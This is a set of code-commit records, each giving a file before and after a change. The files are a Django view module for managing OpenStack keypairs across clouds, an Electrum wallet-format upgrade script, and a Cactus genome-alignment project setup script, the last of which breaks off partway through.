except Exception as exc:
logger.error(exc)
logger.error("Error committing database session after proccessing key transfers")
logger.error("openstack and the database may be out of sync until next keypair poll cycle")
except Exception as exc:
logger.error(exc)
logger.error("Error setting up database objects or during general execution of save_keypairs")
return redirect("manage_keys")
# not a post, do nothing
return None
add view support functions and logger import
import logging
from django.http import HttpResponse
from django.http import StreamingHttpResponse
from django.core.exceptions import PermissionDenied
from django.shortcuts import render, redirect
import glintwebui.config as config
from .__version__ import version
from .db_util import get_db_base_and_session
from .utils import get_keypair, delete_keypair, transfer_keypair, create_keypair, create_new_keypair
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
from sqlalchemy.ext.automap import automap_base
logger = logging.getLogger('glintv2')
def getUser(request):
user = request.META.get('REMOTE_USER')
Base, session = get_db_base_and_session()
Glint_User = Base.classes.csv2_user
auth_user_list = session.query(Glint_User)
for auth_user in auth_user_list:
if user == auth_user.cert_cn or user == auth_user.username:
return auth_user
def verifyUser(request):
auth_user = getUser(request)
return bool(auth_user)
def getSuperUserStatus(request):
auth_user = getUser(request)
if auth_user is None:
return False
else:
return auth_user.is_superuser
# WEB VIEWS
def manage_keys(request, group_name=None, message=None):
if not verifyUser(request):
raise PermissionDenied
user_obj = getUser(request)
if group_name is None:
group_name = user_obj.active_group
Base, session = get_db_base_and_session()
Group_Resources = Base.classes.csv2_group_resources
Keypairs = Base.classes.csv2_keypairs
User_Group = Base.classes.csv2_user_groups
user_groups = session.query(User_Group).filter(User_Group.username == user_obj.username)
group_list = []
for grp in user_groups:
grp_name = grp.group_name
group_list.append(grp_name)
grp_resources = session.query(Group_Resources).filter(Group_Resources.group_name == group_name)
key_dict = {}
num_clouds=0
for cloud in grp_resources:
num_clouds=num_clouds+1
for key in key_dict:
key_dict[key][cloud.cloud_name] = False
cloud_keys = session.query(Keypairs).filter(Keypairs.cloud_name == cloud.cloud_name, Keypairs.group_name == cloud.group_name)
for key in cloud_keys:
# issue of renaming here if keys have different names on different clouds
# the keys will have a unique fingerprint and that is what is used as an identifier
if (key.fingerprint + ";" + key.key_name) in key_dict:
dict_key = key.fingerprint + ";" + key.key_name
key_dict[dict_key][key.cloud_name] = True
else:
dict_key = key.fingerprint + ";" + key.key_name
key_dict[dict_key] = {}
key_dict[dict_key]["name"] = key.key_name
key_dict[dict_key][key.cloud_name] = True
context = {
"group_resources": grp_resources,
"key_dict": key_dict,
"active_group": group_name,
"message": message,
"enable_glint": True,
"user_groups": group_list,
"num_clouds": num_clouds
}
# need to create template
return render(request, 'glintwebui/manage_keys.html', context)
def upload_keypair(request, group_name=None):
if not verifyUser(request):
raise PermissionDenied
if request.method == 'POST':
# set up database objects
Base, session = get_db_base_and_session()
Group_Resources = Base.classes.csv2_group_resources
Keypairs = Base.classes.csv2_keypairs
user = getUser(request)
# get list of target clouds to upload key to
cloud_name_list = request.POST.getlist('clouds')
key_name = request.POST.get("key_name")
key_string = request.POST.get("key_string")
grp = request.POST.get("group_name")
for cloud in cloud_name_list:
db_cloud = session.query(Group_Resources).filter(Group_Resources.group_name == grp, Group_Resources.cloud_name == cloud).first()
try:
new_key = create_keypair(key_name=key_name, key_string=key_string, cloud=db_cloud)
except Exception as exc:
logger.error("Failed openstack request to make keypair")
logger.error(exc)
logger.error("%s is likely an invalid keystring" % key_string)
message = "unable to upload key: '%s' is likely an invalid keystring" % key_string
return manage_keys(request=request, group_name=grp, message=message)
keypair_dict = {
"group_name": grp,
"cloud_name": cloud,
"fingerprint": new_key.fingerprint,
"key_name": key_name
}
new_keypair = Keypairs(**keypair_dict)
session.merge(new_keypair)
try:
session.commit()
except Exception as exc:
logger.error(exc)
logger.error("Error committing database session after creating new key")
logger.error("openstack and the database may be out of sync until next keypair poll cycle")
return redirect("manage_keys")
else:
#not a post do nothing
return None
return None
def new_keypair(request, group_name=None,):
if not verifyUser(request):
raise PermissionDenied
if request.method == 'POST':
# set up database objects
Base, session = get_db_base_and_session()
Group_Resources = Base.classes.csv2_group_resources
Keypairs = Base.classes.csv2_keypairs
user = getUser(request)
# get list of target clouds to upload key to
cloud_name_list = request.POST.getlist('clouds')
key_name = request.POST.get("key_name")
grp = request.POST.get("group_name")
# Only check that needs to be made is if the key name is used on any of the target clouds
for cloud in cloud_name_list:
db_keypair = session.query(Keypairs).filter(Keypairs.group_name == grp, Keypairs.cloud_name == cloud, Keypairs.key_name == key_name).one_or_none()
if db_keypair is None:
#no entry exists, its safe to create this keypair
logging.info("creating new keypair %s on cloud %s" % (key_name, cloud))
#get grp resources obj
cloud_obj = session.query(Group_Resources).filter(Group_Resources.group_name == grp, Group_Resources.cloud_name == cloud).one()
new_key = create_new_keypair(key_name=key_name, cloud=cloud_obj)
keypair_dict = {
"group_name": grp,
"cloud_name": cloud,
"fingerprint": new_key.fingerprint,
"key_name": key_name
}
new_keypair = Keypairs(**keypair_dict)
session.merge(new_keypair)
try:
session.commit()
except Exception as exc:
logger.error(exc)
logger.error("Error committing database session after creating new key")
logger.error("openstack and the database may be out of sync until next keypair poll cycle")
else:
#keypair name exists on this cloud
message = "Keypair name %s in use on cloud: %s. Aborting transation, keypair may have been created on some clouds" % (key_name, cloud)
logger.error(message)
return manage_keys(request=request, group_name=grp, message=message)
return redirect("manage_keys")
else:
#not a post do nothing
return None
def save_keypairs(request, group_name=None, message=None):
if not verifyUser(request):
raise PermissionDenied
user_obj = getUser(request)
if group_name is None:
group_name = user_obj.active_group
if group_name is None:
return None
if request.method == 'POST':
try:
#set up database objects
Base, session = get_db_base_and_session()
Group_Resources = Base.classes.csv2_group_resources
Keypairs = Base.classes.csv2_keypairs
# get list of clouds for this group
# for each cloud: check_list = request.POST.getlist(cloud.cloud_name)
# check the checklist for diffs (add/remove keys)
grp_resources = session.query(Group_Resources).filter(Group_Resources.group_name == group_name)
logger.info("Checking for keys to transfer")
for cloud in grp_resources:
#check_list will only have the names of keys checked for that cloud
check_list = request.POST.getlist(cloud.cloud_name)
#cross reference check list against what is in database:
cloud_keys = session.query(Keypairs).filter(Keypairs.group_name == group_name, Keypairs.cloud_name == cloud.cloud_name)
cloud_fingerprints = []
for keypair in cloud_keys:
cloud_fingerprints.append(keypair.fingerprint + ";" + keypair.key_name)
# check for new key transfers
for keypair_key in check_list:
if keypair_key not in cloud_fingerprints:
# transfer key to this cloud
logger.info("%s not found in %s" % (keypair_key, cloud_fingerprints))
logger.info("Found key: %s to transfer to %s" % (keypair_key, cloud.cloud_name))
split_key = keypair_key.split(";")
fingerprint = split_key[0]
key_name = split_key[1]
# get existing keypair: need name, public_key, key_type and ?user?
logger.info("getting source keypair database object...")
src_keypair = session.query(Keypairs).filter(Keypairs.fingerprint == fingerprint, Keypairs.key_name == key_name).first()
# get group resources corresponding to that keypair
logger.info("getting source cloud...")
src_cloud = session.query(Group_Resources).filter(Group_Resources.group_name == src_keypair.group_name, Group_Resources.cloud_name == src_keypair.cloud_name).first()
# download key from that group resources
logger.info("getting source keypair openstack object...")
os_keypair = get_keypair(keypair_key, src_cloud)
# upload key to current "cloud"
logger.info("transferring keypair...")
transfer_keypair(os_keypair, cloud)
keypair_dict = {
"group_name": group_name,
"cloud_name": cloud.cloud_name,
"fingerprint": fingerprint,
"key_name": key_name
}
new_keypair = Keypairs(**keypair_dict)
session.merge(new_keypair)
try:
session.commit()
except Exception as exc:
logger.error(exc)
logger.error("Error committing database session after proccessing key transfers")
logger.error("openstack and the database may be out of sync until next keypair poll cycle")
# we need to do the entire loop of the clouds twice so we can do all the transfers, then all the deletes
logger.info("Checking for keys to delete")
for cloud in grp_resources:
#check_list will only have the names of keys checked for that cloud
check_list = request.POST.getlist(cloud.cloud_name)
#cross reference check list against what is in database:
cloud_keys = session.query(Keypairs).filter(Keypairs.group_name == group_name, Keypairs.cloud_name == cloud.cloud_name)
for keypair in cloud_keys:
if (keypair.fingerprint + ";" + keypair.key_name) not in check_list:
# key has been deleted from this cloud:
logger.info("Found key to delete: %s" % keypair.key_name)
delete_keypair(keypair.key_name, cloud)
# delete from database
session.delete(keypair)
try:
session.commit()
except Exception as exc:
logger.error(exc)
logger.error("Error committing database session after proccessing key transfers")
logger.error("openstack and the database may be out of sync until next keypair poll cycle")
except Exception as exc:
logger.error(exc)
logger.error("Error setting up database objects or during general execution of save_keypairs")
return redirect("manage_keys")
# not a post, do nothing
return None
|
import electrum, getpass, base64,ast,sys,os
from version import SEED_VERSION
def upgrade_wallet(wallet):
print "walet path:",wallet.path
print "seed version:", wallet.seed_version
if wallet.seed_version == 1 and wallet.use_encryption:
# version 1 used pycrypto for wallet encryption
import Crypto
from Crypto.Cipher import AES
BLOCK_SIZE = 32
PADDING = '{'
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
EncodeAES = lambda secret, s: base64.b64encode(AES.new(secret).encrypt(pad(s)))
DecodeAES = lambda secret, e: AES.new(secret).decrypt(base64.b64decode(e)).rstrip(PADDING)
print "please enter your password"
password = getpass.getpass("Password:")
secret = electrum.Hash(password)
try:
seed = DecodeAES( secret, wallet.seed )
private_keys = ast.literal_eval( DecodeAES( secret, wallet.private_keys ) )
except:
print "sorry"
exit(1)
wallet.version = 2
wallet.seed = wallet.pw_encode( seed, password)
wallet.private_keys = wallet.pw_encode( repr( private_keys ), password)
wallet.save()
print "upgraded to version 2"
exit(1)
if wallet.seed_version < SEED_VERSION:
print """Note: your wallet seed is deprecated. Please create a new wallet, and move your coins to the new wallet."""
if __name__ == "__main__":
try:
path = sys.argv[1]
except:
# backward compatibility: look for wallet file in the default data directory
if "HOME" in os.environ:
wallet_dir = os.path.join( os.environ["HOME"], '.electrum')
elif "LOCALAPPDATA" in os.environ:
wallet_dir = os.path.join( os.environ["LOCALAPPDATA"], 'Electrum' )
elif "APPDATA" in os.environ:
wallet_dir = os.path.join( os.environ["APPDATA"], 'Electrum' )
else:
raise BaseException("No home directory found in environment variables.")
path = os.path.join( wallet_dir, 'electrum.dat')
try:
f = open(path,"r")
data = f.read()
f.close()
except:
print "file not found", path
exit(1)
try:
x = ast.literal_eval(data)
except:
print "error: could not parse wallet"
exit(1)
if type(x) == tuple:
seed_version, use_encryption, fee, host, port, blocks, seed, addresses, private_keys, change_addresses, status, history, labels, addressbook = x
s = {
'seed_version':seed_version,
'use_encryption':use_encryption,
'master_public_key':None,
'fee':fee,
'host':host,
'port':port,
'blocks':blocks,
'seed':seed,
'addresses':addresses,
'change_addresses':change_addresses,
'status':status,
'history':history,
'labels':labels,
'contacts':addressbook
}
f = open(path,"w")
f.write( repr(s) )
f.close()
print "wallet format was upgraded."
exit(1)
wallet = electrum.Wallet(path)
try:
found = wallet.read()
if found:
print wallet.path
else:
print "wallet not found."
except BaseException:
upgrade_wallet(wallet)
fix change addresses in upgrade script
import electrum, getpass, base64,ast,sys,os
from version import SEED_VERSION
def upgrade_wallet(wallet):
print "walet path:",wallet.path
print "seed version:", wallet.seed_version
if wallet.seed_version == 1 and wallet.use_encryption:
# version 1 used pycrypto for wallet encryption
import Crypto
from Crypto.Cipher import AES
BLOCK_SIZE = 32
PADDING = '{'
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
EncodeAES = lambda secret, s: base64.b64encode(AES.new(secret).encrypt(pad(s)))
DecodeAES = lambda secret, e: AES.new(secret).decrypt(base64.b64decode(e)).rstrip(PADDING)
print "please enter your password"
password = getpass.getpass("Password:")
secret = electrum.Hash(password)
try:
seed = DecodeAES( secret, wallet.seed )
private_keys = ast.literal_eval( DecodeAES( secret, wallet.private_keys ) )
except:
print "sorry"
exit(1)
wallet.version = 2
wallet.seed = wallet.pw_encode( seed, password)
wallet.private_keys = wallet.pw_encode( repr( private_keys ), password)
wallet.save()
print "upgraded to version 2"
exit(1)
if wallet.seed_version < SEED_VERSION:
print """Note: your wallet seed is deprecated. Please create a new wallet, and move your coins to the new wallet."""
if __name__ == "__main__":
try:
path = sys.argv[1]
except:
# backward compatibility: look for wallet file in the default data directory
if "HOME" in os.environ:
wallet_dir = os.path.join( os.environ["HOME"], '.electrum')
elif "LOCALAPPDATA" in os.environ:
wallet_dir = os.path.join( os.environ["LOCALAPPDATA"], 'Electrum' )
elif "APPDATA" in os.environ:
wallet_dir = os.path.join( os.environ["APPDATA"], 'Electrum' )
else:
raise BaseException("No home directory found in environment variables.")
path = os.path.join( wallet_dir, 'electrum.dat')
try:
f = open(path,"r")
data = f.read()
f.close()
except:
print "file not found", path
exit(1)
try:
x = ast.literal_eval(data)
except:
print "error: could not parse wallet"
exit(1)
if type(x) == tuple:
seed_version, use_encryption, fee, host, port, blocks, seed, all_addresses, private_keys, change_indexes, status, history, labels, addressbook = x
addresses = []
change_addresses = []
for i in range(len(all_addresses)):
if i in change_indexes:
change_addresses.append(all_addresses[i])
else:
addresses.append(all_addresses[i])
s = {
'seed_version':seed_version,
'use_encryption':use_encryption,
'master_public_key':None,
'fee':fee,
'host':host,
'port':port,
'blocks':blocks,
'seed':seed,
'addresses':addresses,
'change_addresses':change_addresses,
'status':status,
'history':history,
'labels':labels,
'contacts':addressbook
}
f = open(path,"w")
f.write( repr(s) )
f.close()
print "wallet format was upgraded."
exit(1)
wallet = electrum.Wallet(path)
try:
found = wallet.read()
if found:
print wallet.path
else:
print "wallet not found."
except BaseException:
upgrade_wallet(wallet)
|
#!/usr/bin/env python
#Copyright (C) 2011 by Glenn Hickey
#
#Released under the MIT license, see LICENSE.txt
#!/usr/bin/env python
"""Create the multi_cactus xml and directory structure from a workflow template
"""
import os
import sys
from optparse import OptionParser
import xml.etree.ElementTree as ET
import copy
from cactus.progressive.multiCactusProject import MultiCactusProject
from cactus.progressive.multiCactusTree import MultiCactusTree
from cactus.shared.experimentWrapper import ExperimentWrapper
from cactus.shared.configWrapper import ConfigWrapper
from cactus.progressive.outgroup import GreedyOutgroup, DynamicOutgroup
from sonLib.nxnewick import NXNewick
from cactus.preprocessor.cactus_preprocessor import CactusPreprocessor
def createMCProject(tree, experiment, config, options):
mcTree = MultiCactusTree(tree, config.getSubtreeSize())
mcTree.nameUnlabeledInternalNodes(config.getDefaultInternalNodePrefix())
mcTree.computeSubtreeRoots()
mcProj = MultiCactusProject()
mcProj.mcTree = mcTree
mcProj.inputSequences = experiment.getSequences()[:]
mcProj.outputSequenceDir = experiment.getOutputSequenceDir()
if config.getDoSelfAlignment():
mcTree.addSelfEdges()
for name in mcProj.mcTree.getSubtreeRootNames():
expPath = "%s/%s/%s_experiment.xml" % (options.path, name, name)
mcProj.expMap[name] = os.path.abspath(expPath)
alignmentRootId = mcProj.mcTree.getRootId()
if options.root is not None:
try:
alignmentRootId = mcProj.mcTree.getNodeId(options.root)
except:
raise RuntimeError("Specified root name %s not found in tree" % options.root)
mcProj.outgroup = None
if config.getOutgroupStrategy() == 'greedy':
# use the provided outgroup candidates, or use all outgroups
# as candidates if none are given
mcProj.outgroup = GreedyOutgroup()
mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
candidateSet=options.outgroupNames,
candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
maxNumOutgroups=config.getMaxNumOutgroups())
elif config.getOutgroupStrategy() == 'greedyLeaves':
# use all leaves as outgroups, unless outgroup candidates are given
mcProj.outgroup = GreedyOutgroup()
mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
ogSet = options.outgroupNames
if ogSet is None:
ogSet = set([mcProj.mcTree.getName(x) for x in mcProj.mcTree.getLeaves()])
mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
candidateSet=ogSet,
candidateChildFrac=2.0,
maxNumOutgroups=config.getMaxNumOutgroups())
elif config.getOutgroupStrategy() == 'greedyPreference':
# prefer the provided outgroup candidates, if any, but use
# other nodes as "filler" if we can't find enough.
mcProj.outgroup = GreedyOutgroup()
mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
candidateSet=options.outgroupNames,
candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
maxNumOutgroups=config.getMaxNumOutgroups())
mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
candidateSet=None,
candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
maxNumOutgroups=config.getMaxNumOutgroups())
elif config.getOutgroupStrategy() == 'dynamic':
# dynamic programming algorithm that exactly optimizes probability
# that base in target node aligns to at least one base in the
# outgroup set. Caveats are that it only returns leaves, and
# the model used for optimization is super naive. Still, it does
# some things better than greedy approaches such as properly account
# for phylogenetic redundancy, as well as try to factor assembly
# size/quality automatically.
mcProj.outgroup = DynamicOutgroup()
mcProj.outgroup.importTree(mcProj.mcTree, mcProj.getInputSequenceMap(), alignmentRootId,
candidateSet=options.outgroupNames)
mcProj.outgroup.compute(maxNumOutgroups=config.getMaxNumOutgroups())
elif config.getOutgroupStrategy() != 'none':
raise RuntimeError("Could not understand outgroup strategy %s" % config.getOutgroupStrategy())
# if necessary, we reroot the tree at the specified alignment root id. all leaf genomes
# that are no longer in the tree, but still used as outgroups, are moved into special fields
# so that we can remember to, say, get their paths for preprocessing.
specifyAlignmentRoot(mcProj, alignmentRootId)
return mcProj
# it is possible that we start with a much bigger tree than we actually want to align
# (controlled by the --root option in cactus_createMultiCactusProject.py). We use
# the entire tree when selecting outgroups, but right afterward have no use for
# genomes that are neither outgroups, nor in the alignment. We especially don't
# want to waste time preprocessing them. This function, reroots the tree at the
# alignment root then tacks on all the outgroups from ooutside the new tree
# (which must be leaves) as children of the root
def specifyAlignmentRoot(mcProj, alignmentRootId):
# ugly hack to keep track of external outgroups for root experiment (yuck)
mcProj.externalOutgroupNames = set()
# keep around the entire un-rerooted tree so that we can calculate
# the induced species trees for each node correctly -- gross!
mcProj.entireTree = copy.deepcopy(mcProj.mcTree)
# nothing to do
if alignmentRootId == mcProj.mcTree.getRootId():
return
# dig out every outgroup
outGroupNames = set()
if mcProj.outgroup is not None:
for event, ogNameDistList in mcProj.outgroup.ogMap.items():
for og, dist in ogNameDistList:
outGroupNames.add(og)
# i don't like this but we have to assume here that the sequences are
# written in postorder (as in experiments)
allLeafMap = dict()
idx = 0
for node in mcProj.mcTree.postOrderTraversal():
if mcProj.mcTree.isLeaf(node) is True:
allLeafMap[mcProj.mcTree.getName(node)] = mcProj.inputSequences[idx]
idx += 1
# find outgroups we want to extract
keptNodes = set([x for x in mcProj.mcTree.postOrderTraversal(alignmentRootId)])
deadNodes = []
extractOutgroupMap = dict()
for node in mcProj.mcTree.postOrderTraversal():
if node not in keptNodes:
deadNodes.append(node)
name = mcProj.mcTree.getName(node)
if name in outGroupNames:
assert name in allLeafMap
extractOutgroupMap[name] = allLeafMap[name]
mcProj.externalOutgroupNames.add(name)
# reroot the tree!
mcProj.mcTree.reroot(alignmentRootId)
# add the outgroups to the tree (and sequence map)
# computing distance to new root for each one
for ogName, ogPath in extractOutgroupMap.items():
ogId = mcProj.mcTree.getNodeId(ogName)
dist = 0.
x = ogId
while mcProj.mcTree.hasParent(x):
d = mcProj.mcTree.getWeight(mcProj.mcTree.getParent(x), x)
if d is None:
dist = None
break
else:
dist += d
x = mcProj.mcTree.getParent(x)
mcProj.mcTree.addOutgroup(ogName, dist)
allLeafMap[ogName] = ogPath
# remove any experiment directories that have become invalid
for event in mcProj.expMap.keys():
if mcProj.mcTree.getNodeId(event) in deadNodes:
del mcProj.expMap[event]
# flush out all unused nodes, and set the new root
for node in deadNodes:
assert mcProj.mcTree.hasParent(node)
mcProj.mcTree.removeEdge(mcProj.mcTree.getParent(node), node)
# reset input sequences to only contain genomes in tree (making sure to
# keep in postorder)
mcProj.inputSequences = []
for node in mcProj.mcTree.postOrderTraversal():
if mcProj.mcTree.isLeaf(node):
mcProj.inputSequences.append(allLeafMap[mcProj.mcTree.getName(node)])
# go through the tree (located in the template experimet)
# and make sure event names are unique up unitil first dot
def cleanEventTree(experiment):
tree = MultiCactusTree(experiment.getTree())
tree.nameUnlabeledInternalNodes()
for node in tree.breadthFirstTraversal():
if tree.hasName(node):
name = tree.getName(node)
if '.' in name:
newName = name.replace('.', '_')
sys.stderr.write('WARNING renaming event %s to %s\n' %(name, newName))
tree.setName(node, newName)
name = newName
parent = tree.getParent(node)
if parent is not None:
weight = tree.getWeight(parent, node)
if weight is None:
raise RuntimeError('Missing branch length in species_tree tree')
redoPrefix = True
newSuffix = 0
while redoPrefix is True:
redoPrefix = False
for node1 in tree.breadthFirstTraversal():
name1 = tree.getName(node1)
for node2 in tree.breadthFirstTraversal():
name2 = tree.getName(node2)
if node1 != node2 and name1 == name2:
newName = "%s%i" % (name2, newSuffix)
newSuffix += 1
tree.setName(node2, newName)
sys.stderr.write('WARNING renaming event %s to %s\n' % (
name2, newName))
redoPrefix = True
experiment.xmlRoot.attrib["species_tree"] = NXNewick().writeString(tree)
experiment.seqMap = experiment.buildSequenceMap()
# Make the subdirs for each subproblem: name/ and name/name_DB
# and write the experiment files
# and copy over a config with updated reference field
def createFileStructure(mcProj, expTemplate, configTemplate, options):
if not os.path.exists(options.path):
os.makedirs(options.path)
mcProj.writeXML(os.path.join(options.path, "%s_project.xml" % options.name))
seqMap = expTemplate.seqMap
portOffset = 0
for name, expPath in mcProj.expMap.items():
path = os.path.join(options.path, name)
seqMap[name] = os.path.join(path, name + '.fa')
for name, expPath in mcProj.expMap.items():
path = os.path.join(options.path, name)
children = mcProj.entireTree.getChildNames(name)
exp = copy.deepcopy(expTemplate)
# Get outgroups
outgroups = []
if configTemplate.getOutgroupStrategy() != 'none' \
and name in mcProj.outgroup.ogMap:
for og, ogDist in mcProj.outgroup.ogMap[name]:
assert og in seqMap, "No sequence found for outgroup: %s" % og
outgroups += [og]
# Get subtree connecting children + outgroups
assert len(children) > 0
subtree = mcProj.entireTree.extractSpanningTree(children + outgroups)
dbBase = path
if expTemplate.getDbDir() is not None:
dbBase = os.path.abspath(expTemplate.getDbDir())
exp.setDbDir(os.path.join(dbBase, name, "%s_DB" % name))
if expTemplate.getDbType() == "kyoto_tycoon" and \
os.path.splitext(name)[1] != ".kch":
exp.setDbName("%s.kch" % name)
else:
exp.setDbName(name)
if expTemplate.getDbType() == "kyoto_tycoon":
exp.setDbPort(expTemplate.getDbPort() + portOffset)
portOffset += 1
host = expTemplate.getDbHost()
if host is not None:
exp.setDbHost(host)
exp.setReferencePath(os.path.join(path, name + '.fa'))
if configTemplate.getBuildHal() == True:
exp.setHALPath(os.path.join(path, "%s_hal.c2h" % name))
if configTemplate.getBuildFasta() == True:
exp.setHALFastaPath(os.path.join(path, "%s_hal.fa" % name))
exp.updateTree(subtree, seqMap, outgroups)
exp.setConfigPath(os.path.join(path, "%s_config.xml" % name))
if not os.path.exists(exp.getDbDir()):
os.makedirs(exp.getDbDir())
if not os.path.exists(path):
os.makedirs(path)
exp.writeXML(expPath)
config = ConfigWrapper(copy.deepcopy(configTemplate.xmlRoot))
config.setReferenceName(name)
config.writeXML(exp.getConfigPath())
def checkInputSequencePaths(exp):
for event, seq in exp.seqMap.items():
if not os.path.exists(seq):
sys.stderr.write("WARNING: sequence path %s does not exist\n" % seq)
elif os.path.isdir(seq):
contents = os.listdir(seq)
size = 0
for i in contents:
if i[0] != '.':
size += 1
if size == 0:
sys.stderr.write("WARNING: sequence path %s is an empty directory\n" % seq)
class CreateMultiCactusProjectOptions:
def __init__(self, expFile, projectFile, fixNames,
outgroupNames, rootOutgroupDists, rootOutgroupPaths,
root, overwrite):
self.expFile = expFile
self.path = projectFile
self.fixNames = fixNames
self.name = os.path.basename(self.path)
self.outgroupNames = outgroupNames
self.rootOutgroupDists = rootOutgroupDists
self.rootOutgroupPaths = rootOutgroupPaths
self.root = root
self.overwrite = overwrite
def runCreateMultiCactusProject(expFile, projectFile, fixNames=False,
outgroupNames=None, rootOutgroupDists=None, rootOutgroupPaths=None,
root=None, overwrite=False):
options = CreateMultiCactusProjectOptions(expFile, projectFile, fixNames=fixNames,
outgroupNames=outgroupNames, rootOutgroupDists=rootOutgroupDists,
rootOutgroupPaths=rootOutgroupPaths, root=root, overwrite=overwrite)
expTemplate = ExperimentWrapper(ET.parse(options.expFile).getroot())
configPath = expTemplate.getConfigPath()
confTemplate = ConfigWrapper(ET.parse(configPath).getroot())
if options.fixNames:
cleanEventTree(expTemplate)
checkInputSequencePaths(expTemplate)
tree = expTemplate.getTree()
if options.outgroupNames is not None:
options.outgroupNames = set(options.outgroupNames)
projNames = set([tree.getName(x) for x in tree.getLeaves()])
for outgroupName in options.outgroupNames:
if outgroupName not in projNames:
raise RuntimeError("Specified outgroup %s not found in tree" % outgroupName)
mcProj = createMCProject(tree, expTemplate, confTemplate, options)
#Replace the sequences with output sequences
expTemplate.updateTree(mcProj.mcTree, expTemplate.buildSequenceMap())
expTemplate.setSequences(CactusPreprocessor.getOutputSequenceFiles(mcProj.inputSequences, expTemplate.getOutputSequenceDir()))
if options.rootOutgroupPaths is not None:
# hacky -- add the root outgroup to the tree after everything
# else. This ends up being ugly, but avoids running into
# problems with assumptions about tree structure
#
# [this hack is hopefully made redundant by the --root option]
#
mcProj.inputSequences.extend(options.rootOutgroupPaths)
# replace the root outgroup sequence by post-processed output
for i, (outgroupPath, outgroupDist) in enumerate(zip(options.rootOutgroupPaths, options.rootOutgroupDists)):
outgroupPath = CactusPreprocessor.getOutputSequenceFiles(expTemplate.getSequences() + options.rootOutgroupPaths[:i+1], expTemplate.getOutputSequenceDir())[-1]
rootOutgroupName = "rootOutgroup%d" % i
expTemplate.seqMap[rootOutgroupName] = outgroupPath
# Add to tree
mcProj.mcTree.addOutgroup(rootOutgroupName, outgroupDist)
mcProj.mcTree.computeSubtreeRoots()
if mcProj.mcTree.getRootName() not in mcProj.outgroup.ogMap:
# initialize ogMap entry
mcProj.outgroup.ogMap[mcProj.mcTree.getRootName()] = []
mcProj.outgroup.ogMap[mcProj.mcTree.getRootName()].append((rootOutgroupName, outgroupDist))
#Now do the file tree creation
createFileStructure(mcProj, expTemplate, confTemplate, options)
# mcProj.check()
def main():
usage = "usage: %prog [options] <experiment> <output project path>"
description = "Setup a multi-cactus project using an experiment xml as template"
parser = OptionParser(usage=usage, description=description)
parser.add_option("--fixNames", dest="fixNames", default = "True",
help="try to make sequence and event names MAF-compliant [default=true]")
parser.add_option("--outgroupNames", dest="outgroupNames", default = None,
help="comma-separated names of high quality assemblies to use as outgroups [default=everything]")
parser.add_option("--root", dest="root", type=str,
help="name of alignment root (must be labeled ancestral node in tree in input experiment). Useful "
"for allowing the tree to contain nodes that won't be in the alignment but can still be used for "
"outgroups.",
default=None)
parser.add_option("--overwrite", action="store_true", help="Overwrite existing experiment files", default=False)
options, args = parser.parse_args()
if len(args) != 2:
parser.print_help()
raise RuntimeError("Wrong number of arguments")
options.expFile = args[0]
options.path = os.path.abspath(args[1])
options.name = os.path.basename(options.path)
options.fixNames = not options.fixNames.lower() == "false"
if (os.path.isdir(options.path) and not options.overwrite) or os.path.isfile(options.path):
raise RuntimeError("Output project path %s exists\n" % options.path)
expTemplate = ExperimentWrapper(ET.parse(options.expFile).getroot())
configPath = expTemplate.getConfigPath()
confTemplate = ConfigWrapper(ET.parse(configPath).getroot())
if options.fixNames:
cleanEventTree(expTemplate)
checkInputSequencePaths(expTemplate)
tree = expTemplate.getTree()
# Check that the tree is sensible (root has at least 1 child)
if len(tree.getChildren(tree.getRootId())) == 0:
raise RuntimeError("Input species tree has only one node.")
if options.outgroupNames is not None:
projNames = set([tree.getName(x) for x in tree.getLeaves()])
options.outgroupNames = set(options.outgroupNames.split(","))
for outgroupName in options.outgroupNames:
if outgroupName not in projNames:
raise RuntimeError("Specified outgroup %s not found in tree" % outgroupName)
mcProj = createMCProject(tree, expTemplate, confTemplate, options)
#Replace the sequences with output sequences
expTemplate.updateTree(mcProj.mcTree, expTemplate.buildSequenceMap())
expTemplate.setSequences(CactusPreprocessor.getOutputSequenceFiles(mcProj.inputSequences, expTemplate.getOutputSequenceDir()))
#Now do the file tree creation
createFileStructure(mcProj, expTemplate, confTemplate, options)
# mcProj.check()
return 0
if __name__ == '__main__':
main()
Fix warnings about paths not existing when using s3:// paths
#!/usr/bin/env python
#Copyright (C) 2011 by Glenn Hickey
#
#Released under the MIT license, see LICENSE.txt
#!/usr/bin/env python
"""Create the multi_cactus xml and directory structure from a workflow template
"""
import os
import sys
from optparse import OptionParser
import xml.etree.ElementTree as ET
import copy
from cactus.progressive.multiCactusProject import MultiCactusProject
from cactus.progressive.multiCactusTree import MultiCactusTree
from cactus.shared.experimentWrapper import ExperimentWrapper
from cactus.shared.configWrapper import ConfigWrapper
from cactus.progressive.outgroup import GreedyOutgroup, DynamicOutgroup
from sonLib.nxnewick import NXNewick
from cactus.preprocessor.cactus_preprocessor import CactusPreprocessor
def createMCProject(tree, experiment, config, options):
mcTree = MultiCactusTree(tree, config.getSubtreeSize())
mcTree.nameUnlabeledInternalNodes(config.getDefaultInternalNodePrefix())
mcTree.computeSubtreeRoots()
mcProj = MultiCactusProject()
mcProj.mcTree = mcTree
mcProj.inputSequences = experiment.getSequences()[:]
mcProj.outputSequenceDir = experiment.getOutputSequenceDir()
if config.getDoSelfAlignment():
mcTree.addSelfEdges()
for name in mcProj.mcTree.getSubtreeRootNames():
expPath = "%s/%s/%s_experiment.xml" % (options.path, name, name)
mcProj.expMap[name] = os.path.abspath(expPath)
alignmentRootId = mcProj.mcTree.getRootId()
if options.root is not None:
try:
alignmentRootId = mcProj.mcTree.getNodeId(options.root)
except:
raise RuntimeError("Specified root name %s not found in tree" % options.root)
mcProj.outgroup = None
if config.getOutgroupStrategy() == 'greedy':
# use the provided outgroup candidates, or use all outgroups
# as candidates if none are given
mcProj.outgroup = GreedyOutgroup()
